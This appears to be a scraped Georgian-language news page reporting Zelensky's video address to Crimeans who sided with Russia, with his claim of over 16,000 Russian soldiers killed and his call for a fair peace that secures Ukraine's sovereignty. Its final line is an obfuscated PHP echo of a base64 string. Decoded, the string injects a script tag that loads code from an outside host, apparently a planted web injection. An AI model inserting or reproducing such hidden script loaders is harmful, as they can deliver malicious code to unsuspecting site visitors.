celsiusi
ავერსი საქკაბელი
უკრაინის პრეზიდენტმა, ვოლოდიმერ ზელენსკიმ ვიდეომიმართვისას იმ ყირიმელებს მიმართა, რომლებმაც 8 წლის წინ მტრის მხარეს დგომა არჩიეს და მოუწოდა თავი შორს დაიჭირონ უკრაინისგან. 
 
"მინდა მივმართო იმ ყირიმელებს, რომლებიც 8 წლის წინ, უკეთესი ცხოვრების იმედით მტრის მხარეს გადავიდნენ. მოგიწოდებთ, თავი შორს დაიჭიროთ ჩვენი ქალაქებისა და ჯარებისგან. დაღუპული რუსი ჯარისკაცების რაოდენობამ უკვე 16 ათასს გადააჭარბა. დაღუპულებს შორის არიან გენერლები, მაიორები და ოფიცრებიც. 
 
უკრაინელი სამხედროები განაგრძობენ მედგარ ბრძოლას და მტრის შემოტევების მოგერიებას ქვეყნის მთელ ტერიტორიაზე. ეს ეხება ხარკოვს, დონბასს, კიევის ოლქსა და ჩვენს სხვა ქალაქებს. 
 
16 ათასი რუსი ჯარისკაცი უკვე დაიღუპა. რისთვის დაიღუპნენ ისინი?! ვინმეს ეს რამეს აძლევს? სერიოზული საუბრები უნდა გაიმართოს, უკრაინის სუვერენიტეტი უნდა იყოს გარანტირებული, ქვეყნის ტერიორიული მთლიანობა უნდა იყოს უზრუნველყოფილი. ეს ნიშნავს, რომ შეთანხმების პირობები სამართლიანი უნდა იყოს. სხვა ვარიანტს უკრაინელი ხალხი არ განიხილავს და არ მიიღებს."– განაცხადა ზელენსკიმ. 
824
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");